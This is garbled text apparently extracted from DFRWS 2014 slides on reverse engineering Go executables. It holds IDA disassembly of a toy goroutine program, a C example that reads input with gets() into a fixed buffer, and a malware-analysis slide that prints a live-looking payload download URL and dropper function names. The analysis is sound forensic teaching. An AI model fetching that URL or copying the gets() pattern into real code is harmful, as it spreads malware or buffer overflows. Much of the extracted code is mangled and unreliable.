__text:00000000000022EA__text:00000000000022EA loc_22EA: ; CODE XREF: main_hack_hack_hack+11 j__text:00000000000022EA sub rsp, 90h__text:00000000000022F1 xor rax, rax__text:00000000000022F4 mov [rsp+90h+var_58], rax__text:00000000000022F9 cmp rax, 0Ah__text:00000000000022FD jge loc_256C__text:0000000000002303__text:0000000000002303 loc_2303: ; CODE XREF: main_hack_hack_hack+296 j__text:0000000000002303 lea rbx, unk_CE920 ; Representation of "Hacking..."__text:000000000000230B mov rbp, [rbx]__text:000000000000230E mov [rsp+90h+var_38], rbp__text:0000000000002313 mov rbp, [rbx+8]__text:0000000000002317 mov [rsp+90h+var_30], rbp__text:000000000000231C lea rdi, [rsp+90h+var_28]__text:0000000000002321 xor eax, eax__text:0000000000002323 stosq__text:0000000000002325 stosq__text:0000000000002327 lea rbx, [rsp+90h+var_28]__text:000000000000232C cmp rbx, 0__text:0000000000002330 jz loc_268D__text:0000000000002336__text:0000000000002336 loc_2336: ; CODE XREF: main_hack_hack_hack+3BF j__text:0000000000002336 mov [rsp+90h+var_18], rbx__text:000000000000233B mov [rsp+90h+var_10], 1__text:0000000000002347 mov [rsp+90h+var_8], 1__text:0000000000002353 mov [rsp+90h+var_90], offset unk_974E0__text:000000000000235B lea rbx, [rsp+90h+var_38]__text:0000000000002360 mov [rsp+90h+var_88], rbx__text:0000000000002365 call runtime_convT2E__text:000000000000236A mov rax, [rsp+90h+var_18]__text:000000000000236F lea rbx, [rsp+90h+var_80]__text:0000000000002374 mov rdi, rax ; n__text:0000000000002377 mov rsi, rbx ; err__text:000000000000237A movsq__text:000000000000237C movsq__text:000000000000237E mov [rsp+90h+var_90], rax__text:0000000000002382 mov rbx, [rsp+90h+var_10]__text:000000000000238A mov [rsp+90h+var_88], rbx__text:000000000000238F mov rbx, [rsp+90h+var_8]__text:0000000000002397 mov [rsp+90h+var_80], rbx__text:000000000000239C call fmt_Println__text:00000000000023A1 lea rbx, unk_CE920__text:00000000000023A9 mov rbp, [rbx]__text:00000000000023AC mov [rsp+90h+var_38], rbp


7 of 15 8/1/14, 3:43 PM

__text:00000000000023B1 mov rbp, [rbx+8]__text:00000000000023B5 mov [rsp+90h+var_30], rbp__text:00000000000023BA lea rdi, [rsp+90h+var_28]__text:00000000000023BF xor eax, eax__text:00000000000023C1 stosq__text:00000000000023C3 stosq__text:00000000000023C5 lea rbx, [rsp+90h+var_28]__text:00000000000023CA cmp rbx, 0__text:00000000000023CE jz loc_2686__text:00000000000023D4__text:00000000000023D4 loc_23D4: ; CODE XREF: main_hack_hack_hack+3B8 j__text:00000000000023D4 mov [rsp+90h+var_18], rbx__text:00000000000023D9 mov [rsp+90h+var_10], 1__text:00000000000023E5 mov [rsp+90h+var_8], 1__text:00000000000023F1 mov [rsp+90h+var_90], offset unk_974E0__text:00000000000023F9 lea rbx, [rsp+90h+var_38]__text:00000000000023FE mov [rsp+90h+var_88], rbx__text:0000000000002403 call runtime_convT2E__text:0000000000002408 mov rax, [rsp+90h+var_18]__text:000000000000240D lea rbx, [rsp+90h+var_80]__text:0000000000002412 mov rdi, rax ; n__text:0000000000002415 mov rsi, rbx ; err__text:0000000000002418 movsq__text:000000000000241A movsq__text:000000000000241C mov [rsp+90h+var_90], rax__text:0000000000002420 mov rbx, [rsp+90h+var_10]__text:0000000000002428 mov [rsp+90h+var_88], rbx__text:000000000000242D mov rbx, [rsp+90h+var_8]__text:0000000000002435 mov [rsp+90h+var_80], rbx__text:000000000000243A call fmt_Println__text:000000000000243F lea rbx, unk_CCFA0__text:0000000000002447 mov rbp, [rbx]__text:000000000000244A mov [rsp+90h+var_38], rbp__text:000000000000244F mov rbp, [rbx+8]__text:0000000000002453 mov [rsp+90h+var_30], rbp__text:0000000000002458 mov [rsp+90h+var_90], offset unk_94600__text:0000000000002460 mov rbx, [rsp+90h+arg_0]__text:0000000000002468 mov [rsp+90h+var_88], rbx__text:000000000000246D lea rbx, [rsp+90h+var_38]__text:0000000000002472 mov [rsp+90h+var_80], rbx__text:0000000000002477 call runtime_chansend1__text:000000000000247C mov [rsp+90h+var_38], 0__text:0000000000002485 mov [rsp+90h+var_30], 0__text:000000000000248E mov [rsp+90h+var_90], offset unk_94600__text:0000000000002496 mov rbx, [rsp+90h+arg_0]


8 of 15 8/1/14, 3:43 PM

__text:000000000000249E mov [rsp+90h+var_88], rbx__text:00000000000024A3 lea rbx, [rsp+90h+var_38]__text:00000000000024A8 mov [rsp+90h+var_80], rbx__text:00000000000024AD call runtime_chanrecv1__text:00000000000024B2 mov rcx, [rsp+90h+var_38]__text:00000000000024B7 mov rax, [rsp+90h+var_30]__text:00000000000024BC mov [rsp+90h+var_48], rcx__text:00000000000024C1 mov [rsp+90h+var_38], rcx__text:00000000000024C6 mov [rsp+90h+var_40], rax__text:00000000000024CB mov [rsp+90h+var_30], rax__text:00000000000024D0 lea rdi, [rsp+90h+var_28]__text:00000000000024D5 xor eax, eax__text:00000000000024D7 stosq__text:00000000000024D9 stosq__text:00000000000024DB lea rbx, [rsp+90h+var_28]__text:00000000000024E0 cmp rbx, 0__text:00000000000024E4 jz loc_267F__text:00000000000024EA__text:00000000000024EA loc_24EA: ; CODE XREF: main_hack_hack_hack+3B1 j__text:00000000000024EA mov [rsp+90h+var_18], rbx__text:00000000000024EF mov [rsp+90h+var_10], 1__text:00000000000024FB mov [rsp+90h+var_8], 1__text:0000000000002507 mov [rsp+90h+var_90], offset unk_974E0__text:000000000000250F lea rbx, [rsp+90h+var_38]__text:0000000000002514 mov [rsp+90h+var_88], rbx__text:0000000000002519 call runtime_convT2E__text:000000000000251E mov rax, [rsp+90h+var_18]__text:0000000000002523 lea rbx, [rsp+90h+var_80]__text:0000000000002528 mov rdi, rax ; n__text:000000000000252B mov rsi, rbx ; err__text:000000000000252E movsq__text:0000000000002530 movsq__text:0000000000002532 mov [rsp+90h+var_90], rax__text:0000000000002536 mov rbx, [rsp+90h+var_10]__text:000000000000253E mov [rsp+90h+var_88], rbx__text:0000000000002543 mov rbx, [rsp+90h+var_8]__text:000000000000254B mov [rsp+90h+var_80], rbx__text:0000000000002550 call fmt_Println__text:0000000000002555 mov rax, [rsp+90h+var_58]__text:000000000000255A inc rax__text:000000000000255D mov [rsp+90h+var_58], rax__text:0000000000002562 cmp rax, 0Ah__text:0000000000002566 jl loc_2303__text:000000000000256C__text:000000000000256C loc_256C: ; CODE XREF: main_hack_hack_hack+2D j


9 of 15 8/1/14, 3:43 PM

__text:000000000000256C lea rbx, aP_3 ; "P>\r"__text:0000000000002574 mov rbp, [rbx]__text:0000000000002577 mov [rsp+90h+var_38], rbp__text:000000000000257C mov rbp, [rbx+8]__text:0000000000002580 mov [rsp+90h+var_30], rbp__text:0000000000002585 lea rdi, [rsp+90h+var_28]__text:000000000000258A xor eax, eax__text:000000000000258C stosq__text:000000000000258E stosq__text:0000000000002590 lea rbx, [rsp+90h+var_28]__text:0000000000002595 cmp rbx, 0__text:0000000000002599 jz loc_2678__text:000000000000259F__text:000000000000259F loc_259F: ; CODE XREF: main_hack_hack_hack+3AA j__text:000000000000259F mov [rsp+90h+var_18], rbx__text:00000000000025A4 mov [rsp+90h+var_10], 1__text:00000000000025B0 mov [rsp+90h+var_8], 1__text:00000000000025BC mov [rsp+90h+var_90], offset unk_974E0__text:00000000000025C4 lea rbx, [rsp+90h+var_38]__text:00000000000025C9 mov [rsp+90h+var_88], rbx__text:00000000000025CE call runtime_convT2E__text:00000000000025D3 mov rax, [rsp+90h+var_18]__text:00000000000025D8 lea rbx, [rsp+90h+var_80]__text:00000000000025DD mov rdi, rax ; n__text:00000000000025E0 mov rsi, rbx ; err__text:00000000000025E3 movsq__text:00000000000025E5 movsq__text:00000000000025E7 mov [rsp+90h+var_90], rax__text:00000000000025EB mov rbx, [rsp+90h+var_10]__text:00000000000025F3 mov [rsp+90h+var_88], rbx__text:00000000000025F8 mov rbx, [rsp+90h+var_8]__text:0000000000002600 mov [rsp+90h+var_80], rbx__text:0000000000002605 call fmt_Println__text:000000000000260A lea rbx, unk_CC880__text:0000000000002612 mov rbp, [rbx]__text:0000000000002615 mov [rsp+90h+var_38], rbp__text:000000000000261A mov rbp, [rbx+8]__text:000000000000261E mov [rsp+90h+var_30], rbp__text:0000000000002623 mov [rsp+90h+var_90], offset unk_94600__text:000000000000262B mov rbx, [rsp+90h+arg_0]__text:0000000000002633 mov [rsp+90h+var_88], rbx__text:0000000000002638 lea rbx, [rsp+90h+var_38]__text:000000000000263D mov [rsp+90h+var_80], rbx__text:0000000000002642 call runtime_chansend1__text:0000000000002647 mov [rsp+90h+var_59], 1


10 of 15 8/1/14, 3:43 PM

__text:000000000000264C mov [rsp+90h+var_90], offset unk_945A0__text:0000000000002654 mov rbx, [rsp+90h+arg_8]__text:000000000000265C mov [rsp+90h+var_88], rbx__text:0000000000002661 lea rbx, [rsp+90h+var_59]__text:0000000000002666 mov [rsp+90h+var_80], rbx__text:000000000000266B call runtime_chansend1__text:0000000000002670 add rsp, 90h ; Free stack space__text:0000000000002677 retn ; Done__text:0000000000002678 ; ---------------------------------------------------------------------------__text:0000000000002678__text:0000000000002678 loc_2678: ; CODE XREF: main_hack_hack_hack+2C9 j__text:0000000000002678 mov [rbx], eax__text:000000000000267A jmp loc_259F__text:000000000000267F ; ---------------------------------------------------------------------------__text:000000000000267F__text:000000000000267F loc_267F: ; CODE XREF: main_hack_hack_hack+214 j__text:000000000000267F mov [rbx], eax__text:0000000000002681 jmp loc_24EA__text:0000000000002686 ; ---------------------------------------------------------------------------__text:0000000000002686__text:0000000000002686 loc_2686: ; CODE XREF: main_hack_hack_hack+FE j__text:0000000000002686 mov [rbx], eax__text:0000000000002688 jmp loc_23D4__text:000000000000268D ; ---------------------------------------------------------------------------__text:000000000000268D__text:000000000000268D loc_268D: ; CODE XREF: main_hack_hack_hack+60 j__text:000000000000268D mov [rbx], eax__text:000000000000268F jmp loc_2336__text:000000000000268F main_hack_hack_hack endp__text:000000000000268F__text:000000000000268F ; ---------------------------------------------------------------------------__text:0000000000002694 align 20h__text:00000000000026A0__text:00000000000026A0 ; =============== S U B R O U T I N E =======================================__text:00000000000026A0__text:00000000000026A0__text:00000000000026A0 ; void __cdecl main_main()__text:00000000000026A0 main_main proc near ; CODE XREF: main_main+18 j__text:00000000000026A0 ; runtime_main+115 p__text:00000000000026A0__text:00000000000026A0 var_88 = qword ptr -88h__text:00000000000026A0 var_80 = qword ptr -80h__text:00000000000026A0 var_78 = qword ptr -78h__text:00000000000026A0 var_50 = qword ptr -50h__text:00000000000026A0 var_48 = qword ptr -48h


11 of 15 8/1/14, 3:43 PM

__text:00000000000026A0 var_40 = qword ptr -40h__text:00000000000026A0 var_38 = qword ptr -38h__text:00000000000026A0 var_30 = qword ptr -30h__text:00000000000026A0 var_28 = byte ptr -28h__text:00000000000026A0 var_18 = qword ptr -18h__text:00000000000026A0 var_10 = qword ptr -10h__text:00000000000026A0 var_8 = qword ptr -8__text:00000000000026A0__text:00000000000026A0 mov rcx, gs:8A0h ; Make sure there's enough stack space__text:00000000000026A9 lea rax, [rsp+var_8]__text:00000000000026AE cmp rax, [rcx]__text:00000000000026B1 ja short loc_26BA__text:00000000000026B3 call runtime_morestack00_noctxt__text:00000000000026B8 jmp short main_main__text:00000000000026BA ; ---------------------------------------------------------------------------__text:00000000000026BA__text:00000000000026BA loc_26BA: ; CODE XREF: main_main+11 j__text:00000000000026BA sub rsp, 88h ; Allocate stack__text:00000000000026C1 mov [rsp+88h+var_88], offset unk_94600 ; Type for channel (string)__text:00000000000026C9 mov [rsp+88h+var_80], 0__text:00000000000026D2 call runtime_makechan ; Create channel c__text:00000000000026D7 mov rbx, [rsp+88h+var_78] ; Gets created channel: c__text:00000000000026DC mov [rsp+88h+var_40], rbx ; Store channel handle__text:00000000000026E1 mov [rsp+88h+var_88], offset unk_945A0 ; Type for channel (bool)__text:00000000000026E9 mov [rsp+88h+var_80], 0__text:00000000000026F2 call runtime_makechan ; Create channel donebeering__text:00000000000026F7 mov rbx, [rsp+88h+var_78] ; Gets created channel: donebeering__text:00000000000026FC mov [rsp+88h+var_48], rbx ; Store channel handle__text:0000000000002701 mov [rsp+88h+var_88], offset unk_945A0 ; Type for channel (bool)__text:0000000000002709 mov [rsp+88h+var_80], 0__text:0000000000002712 call runtime_makechan ; Create channel donehacking__text:0000000000002717 mov rbx, [rsp+88h+var_78] ; Gets created channel: donehacking__text:000000000000271C mov [rsp+88h+var_50], rbx ; Store channel handle__text:0000000000002721 lea rbx, unk_CF160 ; Representation of "Starting day."__text:0000000000002729 mov rbp, [rbx]__text:000000000000272C mov [rsp+88h+var_38], rbp ; Println madness ensues...__text:0000000000002731 mov rbp, [rbx+8]__text:0000000000002735 mov [rsp+88h+var_30], rbp__text:000000000000273A lea rdi, [rsp+88h+var_28]__text:000000000000273F xor eax, eax__text:0000000000002741 stosq__text:0000000000002743 stosq__text:0000000000002745 lea rbx, [rsp+88h+var_28]__text:000000000000274A cmp rbx, 0__text:000000000000274E jz loc_28DD


12 of 15 8/1/14, 3:43 PM

__text:0000000000002754__text:0000000000002754 loc_2754: ; CODE XREF: main_main+23F j__text:0000000000002754 mov [rsp+88h+var_18], rbx__text:0000000000002759 mov [rsp+88h+var_10], 1__text:0000000000002762 mov [rsp+88h+var_8], 1__text:000000000000276E mov [rsp+88h+var_88], offset unk_974E0__text:0000000000002776 lea rbx, [rsp+88h+var_38]__text:000000000000277B mov [rsp+88h+var_80], rbx__text:0000000000002780 call runtime_convT2E__text:0000000000002785 mov rax, [rsp+88h+var_18]__text:000000000000278A lea rbx, [rsp+88h+var_78]__text:000000000000278F mov rdi, rax ; n__text:0000000000002792 mov rsi, rbx ; err__text:0000000000002795 movsq__text:0000000000002797 movsq__text:0000000000002799 mov [rsp+88h+var_88], rax__text:000000000000279D mov rbx, [rsp+88h+var_10]__text:00000000000027A2 mov [rsp+88h+var_80], rbx__text:00000000000027A7 mov rbx, [rsp+88h+var_8]__text:00000000000027AF mov [rsp+88h+var_78], rbx__text:00000000000027B4 call fmt_Println ; Output "Starting day."__text:00000000000027B9 mov rbx, [rsp+88h+var_40] ; Passing c and...__text:00000000000027BE mov [rsp+88h+var_88], rbx__text:00000000000027C2 mov rbx, [rsp+88h+var_48] ; ...donebeering__text:00000000000027C7 mov [rsp+88h+var_80], rbx__text:00000000000027CC mov ecx, offset main_drink_beer__f ; Addr of func for new goroutine__text:00000000000027D1 push rcx__text:00000000000027D2 push 10h ; 16 bytes of arguments__text:00000000000027D4 call runtime_newproc ; Creation of goroutine "drink_beer()"__text:00000000000027D9 pop rcx__text:00000000000027DA pop rcx__text:00000000000027DB mov rbx, [rsp+88h+var_40] ; Passing c and...__text:00000000000027E0 mov [rsp+88h+var_88], rbx__text:00000000000027E4 mov rbx, [rsp+88h+var_50] ; ...donehacking__text:00000000000027E9 mov [rsp+88h+var_80], rbx__text:00000000000027EE mov ecx, offset main_hack_hack_hack__f ; Addr of func for new goroutine__text:00000000000027F3 push rcx__text:00000000000027F4 push 10h ; 16 bytes of arguments__text:00000000000027F6 call runtime_newproc ; Creation of goroutine "hack_hack_hack()"__text:00000000000027FB pop rcx__text:00000000000027FC pop rcx__text:00000000000027FD mov [rsp+88h+var_88], offset unk_945A0 ; Type of value to receive__text:0000000000002805 mov rbx, [rsp+88h+var_48]__text:000000000000280A mov [rsp+88h+var_80], rbx ; Channel is donebeering__text:000000000000280F mov [rsp+88h+var_78], 0


13 of 15 8/1/14, 3:43 PM

__text:0000000000002818 call runtime_chanrecv1 ; Receive__text:000000000000281D mov [rsp+88h+var_88], offset unk_945A0 ; Type of value to receive__text:0000000000002825 mov rbx, [rsp+88h+var_50]__text:000000000000282A mov [rsp+88h+var_80], rbx ; Channel is donehacking__text:000000000000282F mov [rsp+88h+var_78], 0__text:0000000000002838 call runtime_chanrecv1 ; Receive__text:000000000000283D lea rbx, unk_CF460 ; Representation of "ZZZZZ..."__text:0000000000002845 mov rbp, [rbx]__text:0000000000002848 mov [rsp+88h+var_38], rbp ; Println madness ensues...__text:000000000000284D mov rbp, [rbx+8]__text:0000000000002851 mov [rsp+88h+var_30], rbp__text:0000000000002856 lea rdi, [rsp+88h+var_28]__text:000000000000285B xor eax, eax__text:000000000000285D stosq__text:000000000000285F stosq__text:0000000000002861 lea rbx, [rsp+88h+var_28]__text:0000000000002866 cmp rbx, 0__text:000000000000286A jz short loc_28D9__text:000000000000286C__text:000000000000286C loc_286C: ; CODE XREF: main_main+23B j__text:000000000000286C mov [rsp+88h+var_18], rbx__text:0000000000002871 mov [rsp+88h+var_10], 1__text:000000000000287A mov [rsp+88h+var_8], 1__text:0000000000002886 mov [rsp+88h+var_88], offset unk_974E0__text:000000000000288E lea rbx, [rsp+88h+var_38]__text:0000000000002893 mov [rsp+88h+var_80], rbx__text:0000000000002898 call runtime_convT2E__text:000000000000289D mov rax, [rsp+88h+var_18]__text:00000000000028A2 lea rbx, [rsp+88h+var_78]__text:00000000000028A7 mov rdi, rax ; n__text:00000000000028AA mov rsi, rbx ; err__text:00000000000028AD movsq__text:00000000000028AF movsq__text:00000000000028B1 mov [rsp+88h+var_88], rax ; a__text:00000000000028B5 mov rbx, [rsp+88h+var_10]__text:00000000000028BA mov [rsp+88h+var_80], rbx__text:00000000000028BF mov rbx, [rsp+88h+var_8]__text:00000000000028C7 mov [rsp+88h+var_78], rbx__text:00000000000028CC call fmt_Println ; Output "ZZZZZ..."__text:00000000000028D1 add rsp, 88h ; Free stack space__text:00000000000028D8 retn ; Done__text:00000000000028D9 ; ---------------------------------------------------------------------------__text:00000000000028D9__text:00000000000028D9 loc_28D9: ; CODE XREF: main_main+1CA j__text:00000000000028D9 mov [rbx], eax


14 of 15 8/1/14, 3:43 PM

__text:00000000000028DB jmp short loc_286C__text:00000000000028DD ; ---------------------------------------------------------------------------__text:00000000000028DD__text:00000000000028DD loc_28DD: ; CODE XREF: main_main+AE j__text:00000000000028DD mov [rbx], eax__text:00000000000028DF jmp loc_2754__text:00000000000028DF main_main endp__text:00000000000028DF

LOTS DELETED, one string represention saved for your consideration:

__rodata:00000000000CCFA0 unk_CCFA0 db 0B0h ; ° ; DATA XREF: main_drink_beer+8D o__rodata:00000000000CCFA0 ; main_hack_hack_hack+16F o__rodata:00000000000CCFA1 db 0CFh ; Ï__rodata:00000000000CCFA2 db 0Ch__rodata:00000000000CCFA3 db 0__rodata:00000000000CCFA4 db 0__rodata:00000000000CCFA5 db 0__rodata:00000000000CCFA6 db 0__rodata:00000000000CCFA7 db 0__rodata:00000000000CCFA8 db 7__rodata:00000000000CCFA9 db 0__rodata:00000000000CCFAA db 0__rodata:00000000000CCFAB db 0__rodata:00000000000CCFAC db 0__rodata:00000000000CCFAD db 0__rodata:00000000000CCFAE db 0__rodata:00000000000CCFAF db 0__rodata:00000000000CCFB0 db 74h ; t__rodata:00000000000CCFB1 db 68h ; h__rodata:00000000000CCFB2 db 69h ; i__rodata:00000000000CCFB3 db 72h ; r__rodata:00000000000CCFB4 db 73h ; s__rodata:00000000000CCFB5 db 74h ; t__rodata:00000000000CCFB6 db 79h ; y__rodata:00000000000CCFB7 db 0


15 of 15 8/1/14, 3:43 PM


94"


95"

C&#include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { char buf[50], *suffix; gets(buf); suffix=(strchr(buf,'.')); if (suffix) { if (!strcmp(suffix,".c")) { printf(".c\n"); } else if (!strcmp(suffix,".php")) { printf(".php\n"); } else if (!strcmp(suffix,".doc")) { printf(".doc\n"); } else if (!strcmp(suffix,".xls")) { printf(".xls\n"); } } else { printf("C got nothing for ya.\n"); } }


96"

C&


97"

package main import "strings" import "fmt” func main() { var buf string fmt.Scanf("%s", &buf) if (strings.HasSuffix(buf, ".c")) { fmt.Println(".c"); } else if (strings.HasSuffix(buf, ".php")) { fmt.Println(".php”) } else if (strings.HasSuffix(buf, ".doc")) { fmt.Println(".doc”) } else if (strings.HasSuffix(buf, ".xls")) { fmt.Println(".xls”) } else { fmt.Println("Go got nothing for ya."); } }

go&


98"

//"HasSuffix"tests"whether"the"string"s"ends"with"suffix."

func"HasSuffix(s,"suffix"string)"bool"{"

""""""""return"len(s)">="len(suffix)"&&"s[len(s)tlen(suffix):]"=="suffix"

}"

.text:00499AC8&dword_499AC8&&&&dd&7068702Eh,&0&&&&;&“php.”&

.text:00499AC0&off_499AC0&&&&&&&&&&&dd&offset&dword_499AC8&&

go&

Lots&of&Detail&About&Environment&in&go&Executable&


99"


101"

…&main_main()"

gorouIne&

creaIon&

Most"of"

the"acHon"


102"

“wrong”&

“ApplicaIon&Error!”&

main_main()"


103"

Error&or&not…oops.&

main_main()"


104"

h=p://sourceslang.iwebs.ws/downs/zdx.tgz"

"\\SGRTpgk2.tar.bz2""

…&

main_zCopyFile()"


105"

…&…&

main_zCopyFile()"


106"

&current&dir&(not&shown)&&

&+&“\”"+"

&random&digits&(prev)&

&+&

&'.~!@#$%^&.��’&

main_zCopyFile()"


108"

…&

main_CopyFile&failure&results&

in&sending&“wrong”&

…&sends&random&

name&created&

for&DLL&

main_zCopyFile()"


109"

…&

…&

…&

main_DownFromServer()"


110"

…&

…

These"days,"results"in"a"crash,"because"that"DLL"

is"no"longer"being"served."

Handles"channel"closure"

Back"in"main_main()"


111"


112"//"The"GOTRACEBACK"environment"variable"controls"the"

//"behavior"of"a"Go"program"that"is"crashing"and"exiHng."

//""""""GOTRACEBACK=0"""suppress"all"tracebacks"

//""""""GOTRACEBACK=1"""default"behavior"t"show"tracebacks"but"exclude"runHme"frames"

//""""""GOTRACEBACK=2"""show"tracebacks"including"runHme"frames"

//""""""GOTRACEBACK=crash"""show"tracebacks"including"runHme"frames,"then"crash""

int32"runHmeêgotraceback(bool"*crash)"

{"

""""""""byte"*p;"

"

""""""""if(crash"!="nil)"

""""""""""""""""*crash"="false;"

""""""""p"="runHmeêgetenv("GOTRACEBACK");"

""""""""if(p"=="nil"||"p[0]"=="'\0')"

""""""""""""""""return"1;"""""""//"default"is"on"

""""""""if(runHmeêstrcmp(p,"(byte*)"crash")"=="0)"{"

""""""""""""""""if(crash"!="nil)"

""""""""""""""""""""""""*crash"="true;"

""""""""""""""""return"2;"""""""//"extra"informaHon"

""""""""}"

""""""""return"runHmeêatoi(p);"

}"

/usr/local/go/src/pkg/runIme/runIme.h&


113"

C"".DLL"

C"hates"go"

re(:)&go - center for computation and technologygolden/materials/dfrws2014-go... · 2017. 1....

Documents